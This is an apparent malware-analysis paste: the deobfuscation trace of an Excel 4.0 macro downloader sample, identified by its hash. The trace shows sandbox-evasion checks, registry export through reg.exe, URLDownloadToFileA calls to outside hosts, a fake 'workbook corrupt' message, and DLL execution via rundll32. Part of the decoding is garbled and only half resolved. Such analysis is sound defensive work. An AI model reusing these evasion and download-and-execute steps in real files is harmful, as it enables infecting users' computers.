dissectmalware

Untitled

May 16th, 2020
  1. 4ee0eabfb6c607e8f4de310070aac4c98a396e443f3752ea454de0141e6f49d2
  2.  
  3. Converted to XLSM
  4.  
  5. [Loading Cells]
  6. auto_open: auto_open9fi0g->Sheet2!$IA$48686
  7. [Starting Deobfuscation]
  8. CELL:IA48686 , FullEvaluation ,SET.VALUE(Sheet2!BF33425,"452")
  9. CELL:IA48687 , FullEvaluation ,RUN(Sheet2!FS63410)
  10. CELL:FS63410 , FullEvaluation ,SET.VALUE(Sheet2!CU54656,"362")
  11. CELL:FS63411 , FullEvaluation ,GOTO(FZ4458)
  12. CELL:FZ4458 , FullEvaluation ,SET.VALUE(Sheet2!HA60322,"353.25")
  13. CELL:FZ4459 , FullEvaluation ,RUN(Sheet2!GD22340)
  14. CELL:GD22340 , FullEvaluation ,SET.VALUE(Sheet2!DD46357,"37.4")
  15. CELL:GD22341 , FullEvaluation ,GOTO(FP20455)
  16. CELL:FP20455 , FullEvaluation ,SET.VALUE(Sheet2!HS63601,"347")
  17. CELL:FP20456 , FullEvaluation ,RUN(Sheet2!AS4091)
  18. CELL:AS4091 , FullEvaluation ,SET.VALUE(Sheet2!CO18346,"378.9")
  19. CELL:AS4092 , FullEvaluation ,GOTO(HG31988)
  20. CELL:HG31988 , FullEvaluation ,SET.VALUE(Sheet2!CN26725,"385")
  21. CELL:HG31989 , FullEvaluation ,GOTO(CH10763)
  22. CELL:CH10763 , FullEvaluation ,SET.VALUE(Sheet2!FK14427,"-449")
  23. CELL:CH10764 , FullEvaluation ,RUN(Sheet2!IH26999)
  24. CELL:IH26999 , FullEvaluation ,SET.VALUE(Sheet2!GA34525,"292")
  25. CELL:IH27000 , FullEvaluation ,RUN(Sheet2!FF59546)
  26. CELL:FF59546 , FullEvaluation ,SET.VALUE(Sheet2!ID42616,"-32.8")
  27. CELL:FF59547 , FullEvaluation ,GOTO(GZ54602)
  28. CELL:GZ54602 , FullEvaluation ,FORMULA.FILL("=CLOSE(FALSE)",Sheet2!CO5751)
  29. CELL:GZ54603 , FullEvaluation ,GOTO(R36106)
  30. CELL:R36106 , FullEvaluation ,FORMULA.FILL("=APP.MAXIMIZE()",Sheet2!R36107)
  31. CELL:R36107 , NotImplemented ,APP.MAXIMIZE()
  32. CELL:R36108 , FullEvaluation ,RUN(Sheet2!DW5410)
  33. CELL:DW5410 , FullEvaluation ,FORMULA.FILL("=IF(GET.WINDOW(7),GOTO(R[340]C[-34]),)",Sheet2!DW5411)
  34. CELL:DW5411 , FullBranching ,IF(GET.WINDOW(7),GOTO(R[340]C[-34]),)
  35. CELL:DW5411 , FullEvaluation ,[TRUE] GOTO(R[340]C[-34])
  36. CELL:CO5751 , End , CLOSE(FALSE)
  37. CELL:DW5411 , FullEvaluation ,[FALSE]
  38. CELL:DW5412 , FullEvaluation , GOTO(AR13749)
  39. CELL:AR13749 , FullEvaluation , FORMULA.FILL("=IF(GET.WINDOW(20),,GOTO(R[-7999]C[49]))",Sheet2!AR13750)
  40. CELL:AR13750 , FullBranching , IF(GET.WINDOW(20),,GOTO(R[-7999]C[49]))
  41. CELL:AR13750 , FullEvaluation , [TRUE]
  42. CELL:AR13751 , FullEvaluation , GOTO(AV29078)
  43. CELL:AV29078 , FullEvaluation , FORMULA.FILL("=IF(GET.WINDOW(23)<3,GOTO(R[-23328]C[45]),)",Sheet2!AV29079)
  44. CELL:AV29079 , FullBranching , IF(GET.WINDOW(23)<3,GOTO(R[-23328]C[45]),)
  45. CELL:AV29079 , FullEvaluation , [TRUE] GOTO(R[-23328]C[45])
  46. CELL:CO5751 , End , CLOSE(FALSE)
  47. CELL:AV29079 , FullEvaluation , [FALSE]
  48. CELL:AV29080 , FullEvaluation , RUN(Sheet2!BJ46325)
  49. CELL:BJ46325 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(31),GOTO(R[-40575]C[31]),)",Sheet2!BJ46326)
  50. CELL:BJ46326 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R[-40575]C[31]),)
  51. CELL:BJ46327 , FullEvaluation , GOTO(GE27718)
  52. CELL:GE27718 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(13)<770,GOTO(R[-21968]C[-94]),)",Sheet2!GE27719)
  53. CELL:GE27719 , FullBranching , IF(GET.WORKSPACE(13)<770,GOTO(R[-21968]C[-94]),)
  54. CELL:GE27719 , FullEvaluation , [TRUE] GOTO(R[-21968]C[-94])
  55. CELL:CO5751 , End , CLOSE(FALSE)
  56. CELL:GE27719 , FullEvaluation , [FALSE]
  57. CELL:GE27720 , FullEvaluation , GOTO(CP60011)
  58. CELL:CP60011 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(14)<390,GOTO(R[-54261]C[-1]),)",Sheet2!CP60012)
  59. CELL:CP60012 , FullBranching , IF(GET.WORKSPACE(14)<390,GOTO(R[-54261]C[-1]),)
  60. CELL:CP60012 , FullEvaluation , [TRUE] GOTO(R[-54261]C[-1])
  61. CELL:CO5751 , End , CLOSE(FALSE)
  62. CELL:CP60012 , FullEvaluation , [FALSE]
  63. CELL:CP60013 , FullEvaluation , GOTO(CS19608)
  64. CELL:CS19608 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(19),,GOTO(R[-13858]C[-4]))",Sheet2!CS19609)
  65. CELL:CS19609 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R[-13858]C[-4]))
  66. CELL:CS19610 , FullEvaluation , RUN(Sheet2!GS29666)
  67. CELL:GS29666 , FullEvaluation , FORMULA.FILL("=IF(GET.WORKSPACE(42),,GOTO(R[-23916]C[-108]))",Sheet2!GS29667)
  68. CELL:GS29667 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R[-23916]C[-108]))
  69. CELL:GS29668 , FullEvaluation , RUN(Sheet2!HU29308)
  70. CELL:HU29308 , FullEvaluation , FORMULA.FILL("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R[-23558]C[-136]))",Sheet2!HU29309)
  71. CELL:HU29309 , FullEvaluation , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R[-23558]C[-136]))
  72. CELL:HU29310 , FullEvaluation , RUN(Sheet2!AU60634)
  73. CELL:AU60634 , FullEvaluation , FORMULA.FILL("=""EXPORT HKCU\Software\Microsoft\Office\""",Sheet2!BV63598)
  74. CELL:AU60635 , FullEvaluation , GOTO(DO44944)
  75. CELL:DO44944 , FullEvaluation , FORMULA.FILL("=""C:\Users\Public\f1UGQ65Y.reg""",Sheet2!FE45508)
  76. CELL:DO44945 , FullEvaluation , GOTO(FS57593)
  77. CELL:FS57593 , FullEvaluation , FORMULA.FILL("=R[30457]C[-62]&GET.WORKSPACE(2)&""\Excel\Security ""&R[12367]C[25]&"" /y""",Sheet2!EF33141)
  78. CELL:FS57594 , FullEvaluation , GOTO(GT35338)
  79. CELL:GT35338 , FullEvaluation , FORMULA.FILL("=""C:\Windows\system32\reg.exe""",Sheet2!IT40138)
  80. CELL:GT35339 , FullEvaluation , RUN(Sheet2!DN48647)
  81. CELL:DN48647 , FullEvaluation , FORMULA.FILL("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R[-8510]C[136],R[-15507]C[18],0,5)",Sheet2!DN48648)
  82. CELL:DN48648 , NotImplemented , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open",IT40138,EF33141,0,5)
  83. CELL:DN48649 , FullEvaluation , GOTO(EH10889)
  84. CELL:EH10889 , FullEvaluation , FORMULA.FILL("=WHILE(ISERROR(FILES(R[34616]C[23])))",Sheet2!EH10892)
  85. CELL:EH10890 , FullEvaluation , FORMULA.FILL("=WAIT(NOW()+""00:00:01"")",Sheet2!EH10893)
  86. CELL:EH10891 , FullEvaluation , FORMULA.FILL("=NEXT()",Sheet2!EH10894)
  87. CELL:EH10892 , PartialEvaluation , WHILE(None)
  88. CELL:EH10893 , PartialEvaluation , WAIT(NOW()+"00:00:01")
  89. CELL:EH10894 , PartialEvaluation , NEXT()
  90. CELL:EH10895 , FullEvaluation , RUN(Sheet2!EW52359)
  91. CELL:EW52359 , FullEvaluation , FORMULA.FILL("=FOPEN(R[-6852]C[8])",Sheet2!EW52360)
  92. CELL:EW52360 , PartialEvaluation , FOPEN(None)
  93. CELL:EW52361 , FullEvaluation , RUN(Sheet2!DG39478)
  94. CELL:DG39478 , FullEvaluation , FORMULA.FILL("=FPOS(R[12881]C[42],215)",Sheet2!DG39479)
  95. CELL:DG39479 , PartialEvaluation , FPOS(None,215)
  96. CELL:DG39480 , FullEvaluation , RUN(Sheet2!BA40220)
  97. CELL:BA40220 , FullEvaluation , FORMULA.FILL("=FREAD(R[12139]C[100],255)",Sheet2!BA40221)
  98. CELL:BA40221 , PartialEvaluation , FREAD(None,255)
  99. CELL:BA40222 , FullEvaluation , GOTO(FC7960)
  100. CELL:FC7960 , FullEvaluation , FORMULA.FILL("=FCLOSE(R[44399]C[-6])",Sheet2!FC7961)
  101. CELL:FC7961 , PartialEvaluation , FCLOSE(None)
  102. CELL:FC7962 , FullEvaluation , RUN(Sheet2!FL54842)
  103. CELL:FL54842 , FullEvaluation , FORMULA.FILL("=FILE.DELETE(R[-9335]C[-7])",Sheet2!FL54843)
  104. CELL:FL54843 , NotImplemented , FILE.DELETE(R[-9335]C[-7])
  105. CELL:FL54844 , FullEvaluation , GOTO(GZ65133)
  106. CELL:GZ65133 , FullEvaluation , FORMULA.FILL("=IF(ISNUMBER(SEARCH(""0001"",R[-24913]C[-155])),GOTO(R[-59383]C[-115]),)",Sheet2!GZ65134)
  107. CELL:GZ65134 , FullEvaluation , IF(ISNUMBER(SEARCH("0001",R[-24913]C[-155])),GOTO(R[-59383]C[-115]),)
  108. CELL:GZ65135 , FullEvaluation , RUN(Sheet2!DK15540)
  109. CELL:DK15540 , FullEvaluation , FORMULA.FILL("=""C:\Users\Public\bc1aX2Yl.html""",Sheet2!GB56762)
  110. CELL:DK15541 , FullEvaluation , GOTO(EU27114)
  111. CELL:EU27114 , FullEvaluation , FORMULA.FILL("=""https://docs.microsoft.com/en-us/officeupdates/office-msi-non-security-updates""",Sheet2!BN972)
  112. CELL:EU27115 , FullEvaluation , RUN(Sheet2!AW51716)
  113. CELL:AW51716 , FullEvaluation , FORMULA.FILL("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R[-50745]C[17],R[5045]C[135],0,0)",Sheet2!AW51717)
  114. CELL:AW51717 , NotImplemented , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,BN972,GB56762,0,0)
  115. CELL:AW51718 , FullEvaluation , RUN(Sheet2!BV33962)
  116. CELL:BV33962 , FullEvaluation , FORMULA.FILL("=FILES(R[22799]C[110])",Sheet2!BV33963)
  117. CELL:BV33963 , PartialEvaluation , FILES(None)
  118. CELL:BV33964 , FullEvaluation , RUN(Sheet2!BQ14965)
  119. CELL:BQ14965 , FullEvaluation , FORMULA.FILL("=IF(ISERROR(R[18997]C[5]),GOTO(R[-9215]C[24]),)",Sheet2!BQ14966)
  120. CELL:BQ14966 , FullBranching , IF(ISERROR(R[18997]C[5]),GOTO(R[-9215]C[24]),)
  121. CELL:BQ14966 , FullEvaluation , [TRUE] GOTO(R[-9215]C[24])
  122. CELL:CO5751 , End , CLOSE(FALSE)
  123. CELL:BQ14966 , FullEvaluation , [FALSE]
  124. CELL:BQ14967 , FullEvaluation , GOTO(C35060)
  125. CELL:C35060 , FullEvaluation , SET.VALUE(Sheet2!AC61236,"8")
  126. CELL:C35061 , FullEvaluation , RUN(Sheet2!IN29353)
  127. CELL:IN29353 , FullEvaluation , SET.VALUE(Sheet2!FL6796,"-87")
  128. CELL:IN29354 , FullEvaluation , RUN(Sheet2!FN36847)
  129. CELL:FN36847 , FullEvaluation , SET.VALUE(Sheet2!BW8389,"-8.8")
  130. CELL:FN36848 , FullEvaluation , GOTO(IK6985)
  131. CELL:IK6985 , FullEvaluation , SET.VALUE(Sheet2!CA12945,"-45.5")
  132. CELL:IK6986 , FullEvaluation , RUN(Sheet2!DY25530)
  133. CELL:DY25530 , FullEvaluation , SET.VALUE(Sheet2!FL38246,"68")
  134. CELL:DY25531 , FullEvaluation , GOTO(FZ18874)
  135. CELL:FZ18874 , FullEvaluation , SET.VALUE(Sheet2!DK36937,"-234")
  136. CELL:FZ18875 , FullEvaluation , RUN(Sheet2!FH45323)
  137. CELL:FH45323 , FullEvaluation , SET.VALUE(Sheet2!FT22661,"137")
  138. CELL:FH45324 , FullEvaluation , RUN(Sheet2!EA15701)
  139. CELL:EA15701 , FullEvaluation , SET.VALUE(Sheet2!BA49121,"7")
  140. CELL:EA15702 , FullEvaluation , RUN(Sheet2!GT46470)
  141. CELL:GT46470 , PartialEvaluation , SET.VALUE(Sheet2!DT60050,"-335-GET.CELL(8,AA12995)*4")
  142. CELL:GT46471 , FullEvaluation , RUN(Sheet2!Q12129)
  143. CELL:Q12129 , FullEvaluation , SET.VALUE(Sheet2!GZ47039,"-438")
  144. CELL:Q12130 , FullEvaluation , GOTO(CK16427)
  145. CELL:CK16427 , PartialEvaluation , FORMULA.FILL("<!C:\Users\Publg&CHAR(DT60050+438)&CHAR(DT60050--431)&D&CHAR(DT60050--438)&a&CHAR(DT60050*-0.14749262536873156)&CHAR(DT60050/-4.9130434782608692)&TA4-gtml""",Sheet2!GQ27768)
  146. CELL:CK16428 , FullEvaluation , GOTO(GZ3551)
  147. CELL:GZ3551 , PartialEvaluation , FORMULA.FILL("<!https:./gavqelets-ru/wo-keys-&CHAR(DT60050--451)&hp&CHAR(DT60050/-9.9705882352941178)",Sheet2!FX27683)
  148. CELL:GZ3552 , FullEvaluation , GOTO(FB63284)
  149. CELL:FB63284 , PartialEvaluation , FORMULA.FILL("=CA&CHAR(DT60050/-4.4605263157894735)&L(""urlmon""+""URLDn&CHAR(DT60050+458)&CHAR(DT60050/-3.081818181818182)&loadT&CHAR(DT60050*-0.32743362831858408)&F&CHAR(DT60050--444)&le@"",""JJCBJJ&CHAR(DT60050--373)&,&CHAR(DT60050/-7.0625)&,&CHAR(DT60050*-0.24188790560471976)&[0&CHAR(DT60050*-0.14454277286135694)&514]CZ99],R[&CHAR(DT60050--388)&16/8]C[117]&CHAR(DT60050+383)&0,0)",Sheet2!CC16159)
  150. CELL:FB63285 , FullEvaluation , GOTO(BM16959)
  151. CELL:BM16959 , PartialEvaluation , FORMULA.FILL("=FILEQ(R[13&CHAR(DT60050+388)&70]B[4&CHAR(DT60050/-6.5192307692307692)&])",Sheet2!EO14598)
  152. CELL:BM16960 , FullEvaluation , RUN(Sheet2!CR16525)
  153. CELL:CR16525 , PartialEvaluation , FORMULA.FILL("=IF(ISE&CHAR(DT60050*-0.24188790560471976)&ROP&CHAR(DT60050+379)&CHAR(DT60050+421)&[-10963]&CHAR(DT60050+406)&[-&CHAR(DT60050/-6.2777777777777777)&8]),+RUL(R[&CHAR(DT60050+389)&7892]CZ-29]))",Sheet2!HE25561)
  154. CELL:CR16526 , FullEvaluation , GOTO(CP1933)
  155. CELL:CP1933 , PartialEvaluation , FORMULA.FILL("=""https://jap&CHAR(DT60050*-0.28613569321533922)&njis&CHAR(DT60050--443)&n.il&CHAR(DT60050*-0.30088495575221241)&o&CHAR(DT60050+386)&wp-kews.&CHAR(DT60050/-3.0267857142857144)&CHAR(DT60050--443)&p&CHAR(DT60050/-9.9705882352941178)",Sheet2!H50928)
  156. CELL:CP1934 , FullEvaluation , RUN(Sheet2!HG35487)
  157. CELL:HG35487 , PartialEvaluation , FORMULA.FILL("<CALL(""ur&CHAR(DT60050/-3.1388888888888888)&mon"",&CHAR(DT60050--373)&UQJDownloadToFildA"",&CHAR(DT60050*-0.10029498525073746)&JJBCJJ"",/,R[21511]C[&CHAR(DT60050--384)&221],R[8352&CHAR(DT60050+432)&C[-30]+/,0&CHAR(DT60050--380)",Sheet2!HU19416)
  158. CELL:HG35488 , FullEvaluation , GOTO(DQ35869)
  159. CELL:DQ35869 , PartialEvaluation , FORMULA.FILL("<""The woqkbonkcanno&CHAR(DT60050--455)& bd npendd oq qepaire&CHAR(DT60050*-0.29498525073746312)&aw K&CHAR(DT60050+444)&CHAR(DT60050/-3.4242424242424243)&roso&CHAR(DT60050+441)&s&CHAR(DT60050--408)&xcel becausd ht'scorrup&CHAR(DT60050--455)&.""",Sheet2!HV369)
  160. CELL:DQ35870 , FullEvaluation , RUN(Sheet2!EK7801)
  161. CELL:EK7801 , PartialEvaluation , FORMULA.FILL("=@JERS(QZ,52084]C&CHAR(DT60050+430)&46])",Sheet2!GB53453)
  162. CELL:EK7802 , FullEvaluation , GOTO(FZ49710)
  163. CELL:FZ49710 , PartialEvaluation , FORMULA.FILL("CHAR(DT60050*-0.17994100294985252)&""C9\Windov&CHAR(DT60050/-2.9478260869565216)&Zsystem31\r&CHAR(DT60050--456)&ndll31&CHAR(DT60050+385)&exe!",Sheet2!IE5342)
  164. CELL:FZ49711 , FullEvaluation , RUN(Sheet2!GY50399)
  165. CELL:GY50399 , FullEvaluation , FORMULA.FILL("=R[-18092\CZ147]&"",DlkRegisterServeq""",Sheet2!AZ45860)
  166. CELL:GY50400 , FullEvaluation , GOTO(BK55588)
  167. CELL:BK55588 , PartialEvaluation , FORMULA.FILL("=CALL(""Shekl32"",""RheklExdcuteA"",&CHAR(DT60050*-0.10029498525073746)&JJBCBJJ"",0,""open""+&CHAR(DT60050/-4.1341463414634143)&[-49592]C[1&CHAR(DT60050--388)&8],R[-9064]C[3&CHAR(DT60050--388)&],0,4)",Sheet2!U54934)
  168. CELL:BK55589 , FullEvaluation , GOTO(CC16159)
  169. CELL:CC16160 , FullEvaluation , GOTO(EO14598)
  170. CELL:EO14599 , FullEvaluation , RUN(Sheet2!HE25561)
  171. CELL:HE25562 , FullEvaluation , RUN(Sheet2!H50928)
  172. CELL:H50929 , FullEvaluation , GOTO(HU19416)
  173. CELL:HU19417 , FullEvaluation , RUN(Sheet2!HV369)
  174. CELL:HV370 , FullEvaluation , RUN(Sheet2!GB53453)
  175. CELL:GB53454 , FullEvaluation , RUN(Sheet2!IE5342)
  176. CELL:IE5343 , FullEvaluation , GOTO(AZ45860)